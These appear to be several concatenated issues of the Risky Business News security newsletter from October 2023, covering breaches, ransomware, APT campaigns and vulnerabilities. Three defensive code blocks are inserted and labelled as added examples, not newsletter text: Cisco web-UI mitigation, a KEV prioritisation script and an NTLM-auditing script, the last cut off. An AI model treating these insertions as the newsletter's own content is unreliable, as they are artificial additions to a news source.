Colonial Pipeline denies second ransomware incident: US oil pipeline operator Colonial Pipeline has denied rumors that it got hit by ransomware for a second time. The company denied a claim made by the operators of the Ransomed.vc gang. This comes as no surprise, as the gang has made several unfounded claims about intrusions at several big-name companies over the past two weeks. [Additional coverage in The Record]

Ampersand ransomware attack: TV advertising company Ampersand has confirmed it dealt with a ransomware attack after the Black Basta crew claimed it breached the company earlier this year. [Additional coverage in The Record]

Kansas courts cyber incident: Court systems across Kansas have switched to using pen and paper in the aftermath of a cyberattack that took down some of its IT systems. Residents who have to pay court fees or file paperwork have been asked to visit courthouses in person or deliver documents via fax or mail. Kansas officials say that recovering from the attack will take at least two weeks, if not more. The incident is suspected to be another ransomware attack, with a similar incident hitting some Florida courts last week. [Additional coverage in the Wichita Eagle]

D-Link data breach: Taiwanese networking equipment maker D-Link has confirmed a security breach after some customer data was posted for sale on an underground hacking forum earlier this month. The company says the breach occurred after an employee fell victim to a phishing attack. D-Link says the attacker accessed an old 2015 management system where it extracted customer names and emails. The hacker claimed to have stolen "three million lines of customer information," but D-Link says that only 700 customers were impacted.

General tech and privacy

Tech layoffs: LinkedIn and StackOverflow have laid off employees this week: 700 at LinkedIn and 28% of staff at StackOverflow.

WhatsApp adds passkeys: Meta's WhatsApp messaging platform has announced support for passkeys, following in the footsteps of Google, Apple, Amazon, and many other tech companies.

Non-consensual deepfake porn: There are now almost 250,000 videos of non-consensual deepfake porn. [Additional coverage in Wired/non-paywall]

Government, politics, and policy

New NCF commander: Air Vice-Marshal Tim Neal-Hopes has been appointed as Commander of the UK's National Cyber Force (NCF). Neal-Hopes becomes the agency's second commander. He succeeds James Babbage, who left the NCF for the UK's National Crime Agency earlier this year.

Secure by design guidance: CISA has updated its "Secure by Design" guidance that the agency first released back in April. The guidance has been updated with advice from seven new international partners, on top of the ten organizations that crafted the original document.

"[T]his joint guidance urges software manufacturers to take urgent steps necessary to ship products that are secure by design and revamp their design and development programs to permit only secure by design products to be shipped to customers."

Foreign intelligence guidance: The US National Counterintelligence and Security Center has published a guide to mitigating foreign intelligence threats to private organizations. The guide promotes basic concepts such as identifying critical assets, risk and vulnerability assessments, and mitigation planning. The guide [PDF] covers basic scenarios of dealing with possible foreign intelligence entities, such as insider threats, visitor vetting, foreign travel reporting, and more.

China's IPv6 legislation: China's government has passed new legislation mandating that all new wireless-capable devices support the newer IPv6 standard. The act also requires telecom operators to support the protocol.

Sponsor section

In this Risky Business News sponsor interview, Catalin Cimpanu talks with Airlock Digital founders Daniel Schell and David Cottingham about the recent Microsoft Digital Defense Report and the problem of properly securing PowerShell.

Cybercrime and threat intel

Navy IT manager sentenced: A judge has sentenced a former US Navy IT manager to five years and five months in prison for unlawfully gaining access to a computer database and selling the personal data of thousands of users on the dark web. Marquis Hooper used his Navy credentials to trick a company into granting him access to a database it used to perform background checks. US officials say Hooper used the access to collect data on 9,000 individuals that he sold on the dark web and earned $160,000. The stolen information was used to perform fraud, such as crafting fake IDs to withdraw money from bank accounts. Hooper also granted access to the account to his wife, who is scheduled for sentencing in November.

IDF data for sale: A threat actor claims to be in possession of, and is selling, the personal data of Israeli military and intelligence agents on a Russian-speaking underground hacking forum. The data allegedly contains information on Israel Defense Forces and Israel Security Agency members. According to threat intel firm ZeroFox, the data is being sold for $15,000.

"The threat actor advertising the compromised data for sale instead of sharing it for free indicates that their incentive is unlikely ideological. The initial date of compromise for the advertised data is unclear; however, it is likely perceived as more valuable after the outbreak of hostilities between Israel and Hamas. This is further demonstrated in the price, which is above average for the amount of data advertised."

Discord abuse: Trellix examines how threat actors are abusing Discord for their operations, such as using it for C&C data collection, storing malware payloads, or social engineering.

Discord campaign: And speaking of Discord abuse, Trend Micro published a report on a threat actor using Discord to host and distribute the Lumma infostealer. Just like the Trellix report, Discord was used here for spamming targets via DMs, as a malware CDN, and as C&C.

CobaltStrike hunting: Cyphur Labs have published instructions on how security researchers can hunt for Cobalt Strike 4.9 C&C servers. v4.9 of Cobalt Strike got leaked on a Chinese hacking forum earlier this month, and its usage among threat actors is expected to rise in the coming weeks. So far, Cyphur analysts have identified at least two Cobalt Strike v4.9 servers.

Fake browser updates: Security firm Proofpoint has seen an increase in activity from threat actors that use fake browser updates to deliver malware. The most active groups include SocGholish, FakeSG (RogueRaticate), ZPHP (SmartApeSG), and ClearFake. Proofpoint says these threat actors plant web pages on hacked websites that promote an update for the user's browser. When users download and run the update, they also install malware on their systems. The technique has been used for more than a decade but is seeing a recent resurgence, being primarily used to distribute infostealers and sometimes ransomware.

Malware technical reports

Lumma Stealer: Intrinsec has a report on the Lumma Stealer.

XorDDoS: Palo Alto Networks takes a look at the recent campaigns delivering the XorDDoS malware to Linux systems.

"The XorDDoS Trojan spread around the world during July and August 2023. This threat infects Linux devices and transforms them into zombies for launching DDoS attacks. The attackers coordinate the botnet with C2 domains that they have abused before. However, they have recently relocated their C2 servers to new IP addresses from public hosting services."

BADBOX: Chinese security firm QiAnXin has independently confirmed a Human report on the PEACHPIT ad fraud botnet and the BADBOX threat actor. I was hoping for more info on this threat actor from beyond the GFW, but nothing of the sort for now.

ClearFake: Sekoia researchers have published a technical analysis of ClearFake, a new malicious JavaScript framework deployed on hacked websites to deliver malware using drive-by downloads. This is the same JS framework that stores part of its malicious code inside smart contracts on the Binance blockchain, covered by Guardio and FINSIN over the past weeks. The new framework was first spotted in August and is currently installed on a few hundred sites.

"ClearFake is another 'fake updates' threat leveraging social engineering to trick the user into running a fake web browser update, as for SocGholish and FakeSG malware. By linking the 'fake updates' lure to the watering hole technique, ClearFake operators target a wide range of users and conduct effective, scalable malware distribution campaigns."

Sponsor Demo

Airlock Digital CEO David Cottingham shows Patrick Gray how Airlock's execution control and allowlisting solution works.

APTs and cyber-espionage

Confucius: Chinese security firm Anheng Hunting Labs has published a report on recent Confucius APT operations distributing the River Stealer.

Kimsuky: AhnLab looks at how the Kimsuky APT is using RDP across different campaigns as a way to access and control compromised environments and exfiltrate data.

BadRory: Kaspersky researchers have identified a new APT group named BadRory that has mounted two waves of spear-phishing attacks against Russian organizations. The campaigns took place in October 2022 and April 2023 and leveraged booby-trapped Office emails. Targets included government entities, military contractors, universities, and hospitals. Kaspersky classified the threat actor as "Russian-speaking."

HideBear: QiAnXin has published a report on Operation HideBear, a campaign from the RomCom group spreading a version of the MINEBRIDGE backdoor via spear-phishing emails.

UAC-0165 (Sandworm) telecom attacks: Russian cyber-espionage group Sandworm (UAC-0165) has breached the networks of 11 Ukrainian telecommunications providers. The intrusions took place between May and September this year. According to Ukraine's CERT team, Sandworm operators deployed backdoors (Poseidon, PoemGate) to harvest data and scripts that disrupted equipment, causing outages for telco customers. The Sandworm group has carried out multiple destructive attacks against Ukrainian networks since Russia's invasion of Ukraine, with the latest taking place in May when it hit a government organization.

Vulnerabilities, security research, and bug bounty

CISA, FBI warn of Atlassian widespread exploitation: CISA and the FBI have asked organizations to patch a recently disclosed Atlassian Confluence zero-day (CVE-2023-22515). The zero-day was used by a suspected Chinese APT (Storm-0062) in limited attacks since mid-September. The agencies say they expect the vulnerability to see widespread abuse due to its ease of exploitation and the availability of proof-of-concept code.

Cisco zero-day: A threat actor is exploiting a zero-day vulnerability in the Cisco IOS XE operating system. Tracked as CVE-2023-20198, the zero-day impacts the web UI, and allows a remote, unauthenticated attacker to create an account that has full access to the device. Cisco says its customer support teams discovered the attacks in late September while investigating customer complaints. The company says it's working on a patch and has asked customers to disable the HTTP Server feature on their IOS XE routers and switches. Security firm VulnCheck says it found thousands of Cisco systems that have been compromised and has released a free scanner to detect malicious implants. LeakIX has the number at more than 30,000. The zero-day has a severity rating of 10/10, and this is the second IOS XE zero-day that Cisco discovered over the past month (after CVE-2023-20109).
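The mitigation Cisco asked for, as an added configuration illustration that is not taken from Cisco's advisory: the IOS XE lines that expose the web UI, the lines that turn it off, an access-list alternative for devices that must keep it reachable, and a running-config check to confirm the result. The ACL number and the management subnet are assumed values.

```cisco
! Added illustration (not Cisco's advisory text). Exposed configuration:
! the web UI listens on every interface, reachable by any source address.
ip http server
ip http secure-server

! Mitigation the page describes: disable the HTTP server feature entirely.
no ip http server
no ip http secure-server

! Alternative for devices that must keep the web UI: only allow a
! management subnet (192.0.2.0/24 and ACL 10 are assumed values), log the rest.
access-list 10 permit 192.0.2.0 0.0.0.255
access-list 10 deny any log
ip http access-class 10
ip http secure-server

! Verify from exec mode that no unrestricted server line survived.
show running-config | include ip http
```

After applying either option, the `show` line should return nothing for the disabled case, or the `access-class` line together with `secure-server` for the restricted case; an `ip http server` line on its own means the plaintext web UI is still listening.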

More Exim patches: The developers of the Exim email server have released a security update to patch three zero-days disclosed by the ZDI project. Exim developers released a patch for the first three and most severe zero-days at the start of the month. This latest update has now fixed all six vulnerabilities initially disclosed by ZDI researchers. The Exim team has also deprecated all previous Exim server versions, and only the current 4.96.2 version is now formally supported.

Liferay vulnerabilities: The Liferay Portal CMS has released security updates to patch three persistent XSS vulnerabilities, including one with a severity score of 9.1/10 that can allow threat actors to hijack the entire website. Swiss security firm Pentagrid has a write-up of the bugs here.

CasaOS vulnerabilities: SonarSource researchers have found two vulnerabilities in CasaOS, an open-source OS used by some NAS makers. The two vulnerabilities allow attackers to bypass authentication and gain full access to the CasaOS dashboard. Patches for both bugs were released back in July.

Chrome RCE: GitHub's security team has an analysis of CVE-2023-4069, a type confusion to RCE vulnerability that was patched in the Chrome browser in July this year.

"Vulnerabilities like this are often the starting point for a "one-click" exploit, which compromises the victim's device when they visit a malicious website. What's more, renderer RCE in Chrome allows an attacker to compromise and execute arbitrary code in the Chrome renderer process."

More MFT vulnerabilities: Security firm Rapid7 has found six vulnerabilities in Titan MFT and Titan SFTP, two file-transfer solutions from South River Technologies. Although hard to exploit, the vulnerabilities can allow for full device takeover and have been patched by the vendor. These mark the third and fourth file-transfer solutions where Rapid7 found bugs after finding similar issues in the JSCAPE MFT and Fortra's Globalscape EFT Server. The company says it started looking into the security of file transfer appliances after several products had been widely exploited over the past two years.

Infosec industry

New tool—open-source-web-scanners: Security researcher Simon Bennetts is maintaining a list of open-source web security scanners.

New tool—CloudRecon: Gunnar Andrews and Jason Haddix have open-sourced CloudRecon, a collection of red-team tools for cloud reconnaissance. The tool was presented at this year's DEFCON conference.

Risky Business Podcasts

In this edition of Between Two Nerds, Tom Uren and The Grugq discuss how changing circumstances change the risk/reward balance and change whether effects operations are worthwhile.

Risky Biz News: Israel warns citizens of security camera hack risk

16 October 2023 at 00:30

This newsletter is brought to you by application allow-listing software maker Airlock Digital. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:

In the face of an escalating military conflict with Hamas and Hezbollah forces, the Israeli government has asked citizens to secure home security cameras or shut them down completely, fearing the devices could be hacked and used for espionage and intelligence collection.

In a memo on Friday, Israel's National Cyber Directorate has asked camera owners to change their passwords, enable two-factor authentication if present, and enable automatic security updates.

If camera owners can't change any of their settings, officials have urged owners to either cover camera lenses or shut down devices completely.

Israeli officials aren't taking any chances and have most likely learned a vital lesson from the recent Russo-Ukrainian conflict, where security cameras across Ukraine have been hacked by Russian hackers to track military aid convoys and adjust missile targeting in real time.

With Israel moving a large part of its military forces across the country, not exposing troop and gear location via someone's home camera feed is a must for the safe movement of its troops.

In addition, there is also a propaganda aspect to take into consideration. Since the initial Hamas attack on October 7, footage taken from hacked security cameras showing Hamas rockets hitting Israeli homes has also been widely shared online.

Securing all those cameras will also be a daunting task, even in a time of heightened attention from the general public to any security recommendations.

According to the government's own data, there were more than 66,000 security cameras across Israel that were vulnerable to some sort of remote attack.

According to a Calcalist report, hacks of security cameras are already underway, although it's unclear if this is just aimless hacktivism or actual intelligence collection.

One lesson is clear in all of this, though. In the aftermath of both the Russo-Ukrainian and Israeli-Palestinian conflicts, security cameras have turned out to be the wild cards in modern-day intelligence collection. Sure, there were cameras in Iraq and Afghanistan in the early 2000s, but they were not as widely installed as they are now, when you can watch over entire towns just by hacking into a few routers that still use their default passwords.


Breaches, hacks, and security incidents

Another Aadhaar leak: One of the Indian local government websites leaked Aadhaar data again. This time it got patched when the issue was reported, unlike in the past, when journalists needed to shame the government into taking action. [Additional coverage in TechCrunch]

UK fines Equifax: The UK's financial regulator fined Equifax £11 million ($13.4 million) for the company's 2017 data breach. The FCA says Equifax UK outsourced the data of UK citizens to its US parent company, which then failed to properly secure it and took six weeks to discover it got hacked. The company's 2017 breach exposed the personal data of 163 million users, including 13.8 million UK consumers.

23andMe gets sued: At least five class-action lawsuits have been filed against DNA and genetic testing service 23andMe in the aftermath of its recent security breach. [Additional coverage in Insurance Journal]

CDW ransomware attack: The LockBit ransomware gang is demanding a whopping $80 million ransom from CDW, one of the world's largest IT service providers. CDW says news of the hack is overblown, and the attack didn't impact any of its operations. The company says the hackers only gained access to the internal network of Sirius Federal, a small subsidiary of one of its subsidiaries. The LockBit gang plans to release CDW's stolen data later this week. [Additional coverage in The Record]

Vercel rogue employee: WebDev platform Vercel has "taken appropriate actions" against an employee who used access to its platform to harass a customer with legal threats about a customer domain that was too similar to a domain owned by the employee. Nothing surprising here since Vercel has been caught releasing "open source" alternatives of other people's commercial apps as part of a marketing stunt.

FSL rug pulls after one day: The developers of the FSL cryptocurrency token have exit-scammed and run away with customer funds just one day after launching the project. According to blockchain security firm Beosin, the FSL team took 97% of the tokens they created and sent them to TornadoCash, a known money laundering service. The size of the stolen assets is believed to be $1.68 million, and the value of FSL tokens immediately crashed after news of the developers' rug pull. [Additional coverage in PanewsLab/English coverage]

DDOS attack on aid groups: Hacktivists (with the IQ of a box of rocks) are launching DDOS attacks against non-profits providing humanitarian aid to both sides of the Israeli-Palestinian war—because we all know the non-profits are the ones to blame here. DeRp DeRp! [Additional coverage in Reuters]

General tech and privacy

Chrome 118: Google has released version 118 of its Chrome browser. See here for security patches and webdev-related changes. Major changes include a Read Aloud option in Reading Mode, support for storing Chrome passkeys inside the Apple Keychain, a sandboxed network service on Windows, and the automatic disabling of off-Store extensions if users have opted into the Enhanced Safe Browsing mode. The Chrome Safe Browsing interstitials also got a facelift and will now provide users with recommendations.

Windows 10 security updates: Microsoft has fixed an issue where the last Patch Tuesday security updates were not installing on Windows 10 systems. Better check your OS and see if they installed properly.

Ubuntu malicious translation: Canonical has pulled Ubuntu 23.10 installation images after the team discovered offensive language (described as hate speech) in the OS' Ukrainian translation.

Jersey Island outage: Jersey officials blamed "rogue code" for an IT outage that cut off gas supply to the island for almost a week. [Additional coverage in the BBC]

Cookie banner blocking: Mozilla will test a cookie banner blocker in Firefox 120. The test will only include German users (for now).

YouTube's ad-blocking plans: Ad-blocker company AdBlock Plus has criticized Google for its plans to block ad-blockers on YouTube in an effort to shove a metric ton of ads down its users' throats. This is especially annoying for everyone since Google does nothing about malicious ads shown on YouTube.

Microsoft backtracks on OneDrive changes: Microsoft has backtracked on a planned change to its OneDrive service that was meant to go into effect on October 16. After a deluge of negative feedback, the company says that photos stored in the OneDrive Gallery section will not count towards a user's account quota—as it initially intended to do.

Twitter does Musk things: As the EFF's Eva Galperin perfectly explains, in the face of massive misinformation and disinformation campaigns surrounding the war in Israel, Twitter has decided to crack down on sex workers.

Tech-bro-powered AI is dumb, part 391: A recent analysis has found that all those AI data centers working to sustain the current tech-bro-powered AI investment boom consume astronomical quantities of electricity and water, putting even the cancerous cryptocurrency community to shame. All that energy waste just so some dude can use ChatGPT to answer his girlfriend.

Russia's national firewall: The Insider takes a look at how Russia has built its national firewall system, in many cases, with the help of Western companies.

Government, politics, and policy

US EPA rescinds cybersecurity guidance: The US Environmental Protection Agency (EPA) has retracted cybersecurity guidance it published earlier this year in March. The agency rescinded [PDF] the guidance after a joint lawsuit filed by water companies (AWWA and NRWA) and Republican states. The guidance would have had US states carry out periodic cybersecurity audits of water utilities. The plaintiffs wanted to block the EPA's new rules and argued for rules developed in collaboration with industry groups, similar to how cybersecurity regulation is passed in the electric sector. [Additional coverage in The Record]

Sandvine pulls out of US market: Network intelligence company Sandvine has abandoned plans to sell a new digital surveillance product in the US. Named Digital Witness, the platform can covertly monitor network traffic and track encrypted communications via Signal or WhatsApp. Bloomberg reports that Sandvine has laid off more than 50 employees who were tasked with demoing and preparing the technology for the US market. Sandvine had already provided trials to the US DEA and state and local law enforcement agencies. It's believed the company's past history of working with authoritarian regimes is what led to its exit. The Digital Witness platform is sold to customers in Europe, Asia, North America, and the Middle East, including the likes of Belarus and Azerbaijan. [Additional coverage in Bloomberg/non-paywall]

Sponsor section

In this Risky Business News sponsor interview, Catalin Cimpanu talks with Airlock Digital founders Daniel Schell and David Cottingham about the recent Microsoft Digital Defense Report and the problem of properly securing PowerShell.

Cybercrime and threat intel

Aviram Azari case: US prosecutors say that an Israeli private investigator named Aviram Azari hired hackers to steal emails from climate activists and leak them to news agencies. The stolen emails were used to write articles criticizing the tactics of climate activists. The articles were then cited in lawsuits involving Exxon Mobil, seeking to dodge investigations about its impact on climate change. US prosecutors have not linked Azari to Exxon Mobil. Prosecutors have asked the judge for a sentence of hundreds of months in prison, while Azari's team is asking for a maximum 60 months prison sentence after he pleaded guilty last year. Azari's sentencing is scheduled this week on October 18. [Additional coverage in Reuters]

Smishing gang detained: Something we missed from August is that Slovenian authorities have detained four Romanians who were running a smishing operation out of the city of Maribor.

Reichsadler Cybercrime Group: Sophos has spotted a new threat actor named the Reichsadler Cybercrime Group using a recent WS_FTP vulnerability (CVE-2023-40044) to breach corporate networks and deploy ransomware.

New npm malware: Forty-three malicious npm packages were discovered last week. Check out GitHub's security advisory portal for more details.

RedAlert clones: Cloudflare's security team has spotted malicious websites distributing fake versions of RedAlert, an app that sends rocket alerts to Israeli citizens. The malicious apps contain spyware-like behavior.

DDOS attacks against IL-PS sites: NSFOCUS has published a timeline of all the DDOS attacks that have hit Israeli and Palestinian websites since the start of the most recent conflict.

EvilSln: A security researcher has released a technical write-up and proof-of-concept code on how to hide malicious code in Visual Studio SLN project files—a la North Korea.

Malware technical reports

EtherHiding: Guardio Labs look at how a malware gang named ClearFake is using Binance blockchain smart contracts to hide some of its malicious code. Guardio names this technique EtherHiding—spotted earlier this month by FINSIN.

GuLoader: CERT-Slovenia has published a technical analysis of the GuLoader downloader.

SilverFox: Qihoo 360 has a report on recent SilverFox trojan operations.

Akira ransomware: Fortinet looks at recent versions and operations of the Akira ransomware.

Good Day ransomware: ShadowStackRE has published an analysis of the Good Day ransomware. Researchers say the group has been active since May 2023, and they may be the group behind the Cloak dark web leak site.

Sponsor Demo

Airlock Digital CEO David Cottingham shows Patrick Gray how Airlock's execution control and allowlisting solution works.

APTs and cyber-espionage

Sticky Werewolf: A threat actor named Sticky Werewolf is targeting government organizations in Belarus and Russia. The group uses spear-phishing campaigns for initial access and a commodity remote access trojan named NetWire for data collection and exfiltration. According to Russian security firm BI.ZONE, Sticky Werewolf has been active since April this year and has conducted 30 attacks to date.

Void Rabisu: A Russian cyber-espionage group named Void Rabisu has used a Windows zero-day to target EU politicians working on gender equality. The campaign took place in June and used a zero-day (CVE-2023-36884) in the Windows Search feature that Microsoft later patched in August. The campaign aimed to infect victims with a remote access trojan named PEAPOD. Also known as RomCom, the Void Rabisu group is a former financially motivated group that has pivoted to cyber-espionage on behalf of the Russian government after its invasion of Ukraine.

BLOODALCHEMY: Elastic's security team has published a technical write-up of BLOODALCHEMY, a new backdoor used by a cyber-espionage group the company calls REF5961. Elastic discovered this yet-to-be-attributed APT group on the network of a Foreign Affairs Ministry from a member of the Association of Southeast Asian Nations (ASEAN).

WinRAR zero-day abused by APT groups: A WinRAR zero-day that was used to hack stock and crypto-traders earlier this year has now entered the arsenal of at least three APT groups. Groups like DarkPink, Russia's APT28, and North Korea's Konni have been spotted using the former zero-day in spear-phishing operations. Patched at the end of August, the former WinRAR zero-day (CVE-2023-38831) allows threat actors to run malicious code on a target's system when they decompress booby-trapped ZIP files.

Lazarus' Volgmer and Scout: AhnLab has published a report on Volgmer and Scout, two new malware strains used by North Korean hackers in recent campaigns. The first is a backdoor/dropper, while the second is a basic downloader.

Operation Dream Magic: The same AhnLab team has also published a report on what they call Operation Dream Magic, a Lazarus cyber espionage campaign targeting South Korea.

IL-PS dis/misinformation campaign: Alethea has published a report on a network of Twitter troll accounts pushing dis/misinformation about the recent Israel-Palestinian conflict.

"Alethea has detected a likely inauthentic, coordinated cluster of at least 67 accounts on X posting near-identical content about the conflict and promoting misleading and out of context translations of statements from Russian President Vladimir Putin and Foreign Minister Sergei Lavrov. Alethea observed both pro-Palestine and pro-Israel content from these accounts, suggesting the network's aim may be to stoke anger on both sides of the conflict or to simply capitalize on the current interest in the topic."

Vulnerabilities, security research, and bug bounty

iOS zero-days: Google has published a technical dive into CVE-2023-28205 and CVE-2023-28206, two iOS zero-days that were patched in April after being abused by surveillance vendors.

Signal zero-day rumor: There's a rumor about a Signal zero-day. Nothing has been confirmed so far, though. Could also be FUD.

Milesight router vulnerability: A severe vulnerability (CVE-2023-43261) has been discovered in Milesight cellular routers that can allow threat actors to retrieve login credentials from log files. Security firm VulnCheck says it found signs of potential exploitation in the wild, although the attacks don't appear to be taking place at scale. The affected Milesight routers are typically used in OT networks to connect industrial control equipment to the internet. While more than 5,800 routers are currently accessible over the internet, VulnCheck says the vulnerability only affects older models running firmware before March 2021.

"If you have a Milesight Industrial Cellular Router, it's probably wise to assume all the credentials on the system have been compromised and to simply generate new ones, and ensure no interfaces are reachable via the internet."

WP plugin zero-day: A threat actor is exploiting a recently patched vulnerability (CVE-2023-5360) in a popular WordPress plugin to install backdoors, create new admin accounts, and take over websites. The attacks are targeting the Royal Elementor Addons and Templates plugin, installed on more than 200,000 WordPress sites. Researchers at Wordfence say the plugin has been exploited since the end of August, well before a patch was released last week.

WP security updates: A security update is available for the WordPress CMS, including one RCE.

Juniper security updates: Networking equipment vendor Juniper has released dozens of security updates for its products.

XORtigate PoC: Lexfo has released a PoC for XORtigate, a vulnerability (CVE-2023-27997) in Fortinet devices.

Windows EoP PoC: Filip Dragovic has published a PoC for CVE-2023-36723, an elevation of privilege vulnerability in the Windows Container Manager Service.

Upcoming crypto-wallet bug: Unciphered says it will publish details on a major crypto-wallet vulnerability on November 10.

CISA KEV update: CISA has updated the KEV database to show if vulnerabilities have been used in ransomware attacks. The KEV database has recently surpassed the 1,000 entries mark, and the new update is meant to help organizations prioritize patches. The agency has also launched a second database that lists common misconfigurations exploited in ransomware attacks, such as open RDP and VNC ports.
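One way to put the new ransomware flag to work, as an added example that is not code from the newsletter or from CISA: rank KEV entries for patching, ransomware-linked ones first and then by CISA's due date, restricted to products you actually run. The field names (`cveID`, `product`, `dueDate`, `knownRansomwareCampaignUse`) are those of the published KEV JSON feed; the feed content below is constructed sample data, and its CVE IDs, vendors, products and dates are placeholders, not real entries.

```powershell
# Added example (not from the newsletter or CISA): prioritize KEV entries for
# patching using the knownRansomwareCampaignUse field. $sampleKev is constructed
# sample data in the shape of the real feed; every value in it is a placeholder.
$sampleKev = @'
{
  "title": "constructed sample, not the real KEV feed",
  "vulnerabilities": [
    { "cveID": "CVE-EXAMPLE-0001", "vendorProject": "VendorA", "product": "Edge Gateway",
      "dueDate": "2023-11-10", "knownRansomwareCampaignUse": "Unknown" },
    { "cveID": "CVE-EXAMPLE-0002", "vendorProject": "VendorB", "product": "Wiki Server",
      "dueDate": "2023-11-03", "knownRansomwareCampaignUse": "Known" },
    { "cveID": "CVE-EXAMPLE-0003", "vendorProject": "VendorC", "product": "File Transfer",
      "dueDate": "2023-10-20", "knownRansomwareCampaignUse": "Known" },
    { "cveID": "CVE-EXAMPLE-0004", "vendorProject": "VendorD", "product": "Printer Firmware",
      "dueDate": "2023-10-15", "knownRansomwareCampaignUse": "Unknown" }
  ]
}
'@

function Get-KevPatchOrder {
    param(
        [Parameter(Mandatory)] [string] $Json,
        [string[]] $InventoryProducts   # empty = keep every entry
    )
    $kev = $Json | ConvertFrom-Json
    $kev.vulnerabilities |
        # Keep only products present in our inventory (when an inventory is given)
        Where-Object { -not $InventoryProducts -or ($InventoryProducts -contains $_.product) } |
        # $false sorts before $true, so "Known" ransomware use floats to the top;
        # within each group the earliest CISA due date comes first
        Sort-Object @{ Expression = { $_.knownRansomwareCampaignUse -ne 'Known' } },
                    @{ Expression = { [datetime]$_.dueDate } } |
        Select-Object cveID, vendorProject, product, dueDate, knownRansomwareCampaignUse
}

# Against the constructed feed: we run the wiki, the file-transfer server and the
# printer, so CVE-EXAMPLE-0001 is dropped, the two ransomware-linked entries come
# out first (0003 then 0002, by due date) and 0004 last.
Get-KevPatchOrder -Json $sampleKev -InventoryProducts 'Wiki Server', 'File Transfer', 'Printer Firmware' |
    Format-Table -AutoSize

# For the live catalog, feed the published JSON in the same way, for example:
# $url  = 'https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json'
# Get-KevPatchOrder -Json (Invoke-WebRequest -Uri $url).Content -InventoryProducts $myProducts
```

Matching on the feed's free-text `product` field is the weak point of this approach; in practice you would map KEV vendor/product strings onto your asset inventory's naming once and reuse that mapping rather than relying on exact string equality.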

Infosec industry

Former Uber CSO appeals: Former Uber CSO Joseph Sullivan filed an appeal against the DOJ and is seeking a reversal of his conviction and a new trial. Sullivan was sentenced to three years probation for covering up a security breach at Uber in 2016. Sullivan's legal team calls the conviction "profoundly flawed" and claims the DOJ mischaracterized Sullivan's actions. [Additional coverage in SecurityInfoWatch]

New tool—ELITEWOLF: The US NSA has released a GitHub project named ELITEWOLF containing a collection of signatures designed to detect malicious activity on ICS/SCADA/OT networks.

New tool—OpenSSF Malicious Packages: The Open Source Security Foundation has launched the OpenSSF Malicious Packages, a repository containing a list of malicious libraries spotted across the open-source ecosystem.

New tool—QBinDiff: QuarksLab has open-sourced a tool named QBinDiff for binary diffing.

New tool—Stompy: Security researcher Andy Gill has released a tool named Stompy that can timestomp files as part of red-team exercises.

FIRSTCON23 videos: Talks from the FIRSTCON23 security conference, which took place back in June, are available on YouTube.

Legal ransom payment map: Splunk's Ryan Kovar has put together a map with the places where it's legal to pay ransomware groups.

Risky Business Podcasts

In this edition of Between Two Nerds, Tom Uren and The Grugq examine the opportunities that ransomware gangs and business email compromise/romance scammers have to collaborate.

Risky Biz News: Microsoft takes NTLM behind the shed

13 October 2023 at 00:30

This newsletter is brought to you by Netwrix, an IT security software company that enables security professionals to strengthen their security and compliance posture across all three primary attack vectors: data, identity, and infrastructure. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:

Microsoft has announced plans to disable support for the NTLM authentication protocol in a future version of Windows 11.

Even though Microsoft has not put out a hard cut-off date, this is still good news, as it sets the stage for the protocol to be removed after 30 years of use.

Short for New Technology LAN Manager, the protocol was introduced in 1993 with the release of Windows NT 3.1. It was the primary user authentication protocol until Windows 2000, when it was replaced by Kerberos.

Since then, NTLM has been included in Windows as a backup authentication protocol for legacy purposes and in situations where Kerberos couldn't work properly. This included offline/local use or (segmented) network topologies where there was no direct line-of-sight to a Domain Controller.

Microsoft says that it is (very well) aware of these issues, and that's why, instead of a hard disable, it will first fix Kerberos' shortcomings.

The company says it is working on two new Kerberos features named IAKerb and local KDC that will allow Kerberos to work "in more diverse network topologies" and in offline/local scenarios where there's no Domain Controller available.

These features will gradually make their way into Windows 11, but not Windows 10, which is closer to its End-of-Support than most people realize (ahem, two years and one day—October 14, 2025).

The company is also adding tools and logging capabilities to monitor NTLM usage in corporate environments, along with finer-grained group policies to disable or block NTLM.

Once NTLM usage goes down, Microsoft says it will pull the plug and announce a hard date when the protocol will be disabled in Windows 11.

"Reducing the use of NTLM will ultimately culminate in it being disabled in Windows 11. We are taking a data-driven approach and monitoring reductions in NTLM usage to determine when it will be safe to disable."

The news of NTLM's upcoming removal comes on the same week that Microsoft also took VBScript behind the shed.
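If you want a head start on the "monitor NTLM usage before you block it" part, the building blocks have been in Windows for years. The script below is an added example, not Microsoft's new tooling and not code from the newsletter: it switches the existing "Network security: Restrict NTLM" policies into audit-only mode through their backing registry values, then summarizes the audit events Windows writes to the `Microsoft-Windows-NTLM/Operational` log (IDs 8001 through 8004). The CSV path and the generic "Field: value" parsing of the event messages are my choices, not anything Microsoft documents. Run it in an elevated PowerShell session.

```powershell
# Added example (not Microsoft's tooling, not from the newsletter): turn on
# audit-only NTLM logging and summarize who still depends on NTLM. Run elevated.

$msv = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0'

# Audit, do not block. These values back the Group Policy settings:
#   AuditReceivingNTLMTraffic  2 = audit incoming NTLM traffic for all accounts
#   RestrictSendingNTLMTraffic 1 = audit outgoing NTLM traffic to remote servers
Set-ItemProperty -Path $msv -Name AuditReceivingNTLMTraffic  -Value 2 -Type DWord
Set-ItemProperty -Path $msv -Name RestrictSendingNTLMTraffic -Value 1 -Type DWord

# Audit events land in this operational log as IDs 8001-8004
# (8001 = outgoing client-side audit, 8002 = incoming server-side audit,
#  8003/8004 = domain-level audits recorded on domain controllers).
$log    = 'Microsoft-Windows-NTLM/Operational'
$events = Get-WinEvent -LogName $log -ErrorAction SilentlyContinue |
    Where-Object { $_.Id -in @(8001, 8002, 8003, 8004) }

if (-not $events) {
    'No NTLM audit events recorded yet; leave auditing on and re-run after a representative period.'
    return
}

# Each message is a block of "Field: value" lines (target server, client process,
# user, domain, ...). Flatten them into objects so the data can be grouped or
# exported without hard-coding field order, which differs between event IDs.
$rows = foreach ($e in $events) {
    $o = [ordered]@{ TimeCreated = $e.TimeCreated; EventId = $e.Id; Computer = $e.MachineName }
    foreach ($line in ($e.Message -split "`r?`n")) {
        if ($line -match '^\s*(?<k>[^:]+?):\s*(?<v>\S.*?)\s*$') { $o[$Matches.k] = $Matches.v }
    }
    [pscustomobject]$o
}
$rows = @($rows)

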